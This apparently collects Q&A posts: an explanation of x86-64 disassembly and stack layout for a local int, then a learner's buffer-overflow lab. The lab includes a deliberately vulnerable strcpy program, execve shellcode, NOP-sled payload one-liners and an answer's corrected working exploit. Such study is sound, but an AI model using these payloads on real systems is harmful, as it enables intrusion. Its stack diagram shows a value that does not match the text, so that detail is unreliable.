> 40028c: 48 2d 3f e9 e2 b2 sub $0xffffffffb2e2e93f,%rax
> 400292: f7 06 53 df ba af testl $0xafbadf53,(%rsi)
287c287
< 4004f8: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
---
> 4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
Note that at address 0x4004f8 your number is there: 4e 61 bc 00 in prog2 and 00 00 00 00 in prog1, both 4 bytes, which is equal to sizeof(int). The bytes 4e 61 bc 00 are 0x00bc614e stored least significant byte first. The bytes c7 45 fc are the rest of the instruction (move an immediate value to an offset from rbp). Also note that the first two sections that differ have the same size in bytes (21). So there you go: although slightly different, they're the same size.
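To make the byte layout concrete, here is a small C sketch that rebuilds the 7 bytes of that instruction from a given value. The helper name encode_movl_imm_to_rbp_minus_4 is hypothetical, and the three leading bytes are simply the ones visible in the objdump listing; only the last four bytes change with the value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Length of the encoded instruction: opcode, ModRM, disp8, imm32. */
enum { MOVL_IMM_RBP_LEN = 7 };

/* Writes the machine code for `movl $imm, -0x4(%rbp)` into out[0..6].
   Hypothetical helper for illustration only. */
void encode_movl_imm_to_rbp_minus_4(uint32_t imm, uint8_t out[MOVL_IMM_RBP_LEN])
{
    assert(out != NULL);
    out[0] = 0xc7;                 /* opcode: mov r/m32, imm32 */
    out[1] = 0x45;                 /* ModRM: memory operand [rbp + disp8] */
    out[2] = 0xfc;                 /* disp8 = -4 */
    for (int k = 0; k < 4; k++)    /* immediate, least significant byte first */
        out[3 + k] = (uint8_t)(imm >> (8 * k));
}
```

With imm = 12345678 the buffer holds c7 45 fc 4e 61 bc 00, and with imm = 0 it holds c7 45 fc 00 00 00 00: same length either way.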
Step by step through Assembly Instructions
push %rbp; mov %rsp, %rbp: This is called setting up the Stack Frame, and is standard for all C functions (unless you tell gcc -fomit-frame-pointer). This enables you to access the stack and your local variables through a fixed register, in this case, rbp.
mov %edi, -0x14(%rbp): This moves the content of register edi into our local variables frame, specifically at offset -0x14.
mov %rsi, -0x20(%rbp): Same here, but this time it saves rsi. This is part of the x86_64 calling convention (which passes the first arguments in registers instead of pushing everything on the stack like x86_32). Instead of keeping them in registers, this unoptimized code frees the registers by saving their contents in our local variables frame. Registers are much faster than memory and are what the CPU actually operates on, so the more free registers we have, the better.
Note: edi is the lower 4 bytes of the rdi register, and from the x86_64 calling convention we know that rdi is used for the first argument. main's first argument is int argc, so it makes sense to use a 4-byte register to store it. rsi holds the second argument, argv, which is a pointer to pointers to char (char **argv). On 64-bit architectures a pointer fits perfectly into a 64-bit register.
<+11>: movl $0xbc614e,-0x4(%rbp): This is the actual line int i = 12345678 (0xbc614e = 12345678 in decimal). Note that the way we "move" that value is very similar to how we stored the main arguments. We use offset -0x4(%rbp) to store it in memory, in the "local variables frame" (this answers your question about where it gets stored).
mov $0x0, %eax; pop %rbp; retq: Again, dull stuff: set the return value to 0, restore the caller's frame pointer and return (ending the program, since we're in main).
Note that in the second example, the only difference is the line <+11>: movl $0x0,-0x4(%rbp), which effectively stores the value zero: in C words, int i = 0.
So, from these instructions you can see that the main function of both programs gets translated to assembly in exactly the same way, so their sizes are the same in the end. (This assumes you compiled them the same way, because the compiler also puts lots of other things in the binaries, like data, library functions, etc.) On Linux, you can get a full disassembly dump using objdump -D program.
Note 2: In these examples, you cannot see the computer subtracting a value from rsp in order to allocate stack space, but that's how it's normally done. Here main calls no other function, so the x86_64 System V ABI lets it use the 128-byte red zone below rsp without adjusting rsp.
Stack Representation
The stack would be like this for both cases (only the value of i would change, or the value at -0x4(%rbp))
| ~~~ | Higher Memory addresses
| |
+------------------+ <--- Address 0x8(%rbp)
| RETURN ADDRESS |
+------------------+ <--- Address 0x0(%rbp) // instruction push %rbp
| previous rbp |
+------------------+ <--- Address -0x4(%rbp)
| i=0x11223344 |
+------------------+ <---- Address -0x14(%rbp)
| argc |
+------------------+ <---- address -0x20(%rbp)
| argv |
+------------------+
| |
+~~~~~~~~~~~~~~~~~~+ Lower memory addresses
Note 3: The direction in which the stack grows depends on your architecture. How data gets written in memory also depends on your architecture.

Syscall inside shellcode won't run

Note: I've already asked this question on Stack Overflow in Portuguese: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this is just a translation of the question from Portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled on Ubuntu 15.04 x86-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawns a shell and then exits. Note that this code works on its own. That is: if I assemble, link and run this code alone, it works.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of objdump -d -M intel for the above program, from which the shellcode was extracted (note: the language of the output is Portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command produces the payload, which injects the shellcode along with the needed NOP sled and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've debugged my program with the shellcode injected very carefully, watching the RIP register to see where the execution goes wrong. I've discovered that:
The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes fine until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the registers correctly set up to do a syscall. Strangely, after this line, the bits of the RAX and RCX registers are all set.
The result is that the execution reaches the unconditional call that pushes the address of the shell string again, and an infinite loop starts until the program crashes with a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
Some would say that my "/bin/sh" string needs to be null terminated. Well, it does not seem to be necessary; nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64-bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to Jester's answer, the first problem was solved. Additionally, I discovered that shellcode is not required to work as a standalone program. The new assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if I inject it into another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL-terminated string "/bin/sh". The OS seems to do some initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: the real reason my syscall did not succeed is that the "/bin/sh" string was not NULL terminated at runtime, whereas it worked as a standalone program because in that case it was NULL terminated.
Therefore, the fact that your shellcode runs fine as a standalone program is not proof that it works.
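As a rough illustration of the termination problem in C: the sketch below lays out the end of the injected payload as it sits in memory, with "/bin/sh" immediately followed by the return address bytes from the first payload above. The helper names are hypothetical, and the 14-byte buffer is only an assumption made to keep the example small.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Counts bytes up to the first NUL, looking at no more than `limit` bytes. */
size_t bounded_length(const unsigned char *p, size_t limit)
{
    assert(p != NULL);
    size_t n = 0;
    while (n < limit && p[n] != 0)
        n++;
    return n;
}

/* Builds the tail of the payload: "/bin/sh" directly followed by the six
   return-address bytes, then the NUL that ends the copied argument. */
void build_payload_tail(unsigned char tail[14])
{
    memcpy(tail, "/bin/sh", 7);                       /* no terminator copied */
    memcpy(tail + 7, "\xd0\xd8\xff\xff\xff\x7f", 6);  /* return address bytes */
    tail[13] = 0;                                     /* end of the argument */
}
```

Right after build_payload_tail, bounded_length reports 13 rather than 7, so the path handed to execve() would not be "/bin/sh". Storing a zero at index 7, which is what mov %al,0x7(%rdi) does at runtime, brings the length back to 7.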
The exploitation was successful... at least in GDB. Now I have a new problem: the exploit works inside GDB, but not outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just a matter of unsetting two environment variables and finding a new return address, but unsetting the two variables did not make the slightest difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why does the exploit work inside GDB but not outside it?

The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
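To see why the top bits matter, here is a small C model of the two instructions. This is only a sketch: the function names are made up, and the leftover register value in the usage note is an arbitrary example, not something read from the actual process.

```c
#include <assert.h>
#include <stdint.h>

/* Models `mov al, imm8`: only the lowest 8 bits of rax change. */
uint64_t mov_al(uint64_t rax, uint8_t imm8)
{
    uint64_t result = (rax & ~(uint64_t)0xff) | imm8;
    assert((result & 0xff) == imm8);   /* low byte is always the immediate */
    return result;
}

/* Models `xor eax, eax`: a write to a 32-bit register zero-extends into
   the full 64-bit register, so rax becomes 0. */
uint64_t xor_eax_eax(uint64_t rax)
{
    (void)rax;                         /* the old value is discarded */
    return 0;
}
```

If rax happened to hold 0x00007fffffffd8d0, mov_al(rax, 59) yields 0x00007fffffffd83b, which is not syscall number 59. Running xor_eax_eax first and then mov_al gives exactly 59.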
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
The above code (with the return address adjusted for my system) works fine here.
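The offset and padding adjustments mentioned above are plain arithmetic, sketched here in C. The function names are hypothetical, and the figure of 136 bytes before the return address is inferred from the payloads in this thread (NOP count plus shellcode length adds up to 136 in each of them) rather than stated anywhere.

```c
#include <assert.h>
#include <stdint.h>

/* Displacement stored in a 2-byte `jmp short` located at offset `at`. */
int8_t jmp_short_rel8(int at, int target)
{
    int rel = target - (at + 2);        /* relative to the next instruction */
    assert(rel >= -128 && rel <= 127);  /* must fit in one signed byte */
    return (int8_t)rel;
}

/* Displacement stored in a 5-byte `call rel32` located at offset `at`. */
int32_t call_rel32(int at, int target)
{
    return (int32_t)(target - (at + 5));
}

/* NOP padding needed so that sled plus shellcode fills `gap` bytes. */
int nop_count(int gap, int shellcode_len)
{
    assert(shellcode_len <= gap);
    return gap - shellcode_len;
}
```

In the fixed shellcode, push_shell sits at offset 0x1a and starter at offset 2, so the jmp encodes 0x18 (eb 18) and the call encodes -29 (e8 e3 ff ff ff). The shellcode is 38 bytes long, which leaves 136 - 38 = 98 NOPs.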